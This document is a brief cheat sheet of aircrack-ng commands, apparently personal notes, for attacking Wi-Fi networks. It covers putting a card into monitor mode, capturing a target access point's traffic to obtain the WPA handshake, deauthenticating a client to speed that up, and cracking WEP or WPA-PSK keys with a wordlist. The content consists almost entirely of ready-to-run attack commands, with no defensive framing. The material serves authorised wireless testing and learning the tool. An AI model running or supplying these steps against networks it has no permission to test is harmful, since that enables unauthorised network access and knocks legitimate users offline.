https://github.com/aircrack-ng/aircrack-ng

Monitor Mode

airmon-ng check kill
Kill processes that interfere with monitor mode.

airmon-ng start wlan0
Start monitor mode on wlan0 interface.

Capture

airodump-ng wlan0mon
Listen for APs around.

airodump-ng --channel 6 --bssid AP:MAC -w capture wlan0mon
Capture traffic from an AP. Need to wait for WPA handshake in the top right. Can use Deauth attack to speed up the process.

Deauth Attack

aireplay-ng -0 1 -a AP:MAC -c CLIENT:MAC wlan0mon
Deauth attack (kick the client off the AP really quick).

-0 1
Deauth, one time.

-c
Client to deauthenticate.

Crack WEP, WPA-PSK

aircrack-ng -a WEP myCapture.cap
aircrack-ng -w wordlist.txt -b AP:MAC myCaptureFromAirodump

-a WEP
Attack Mode: WEP (Need > 5000 IV) or WPA-PSK.

-e mySSID
Specifies SSID.

-n 64
Size of the key (64, 128, 152, 256, 512).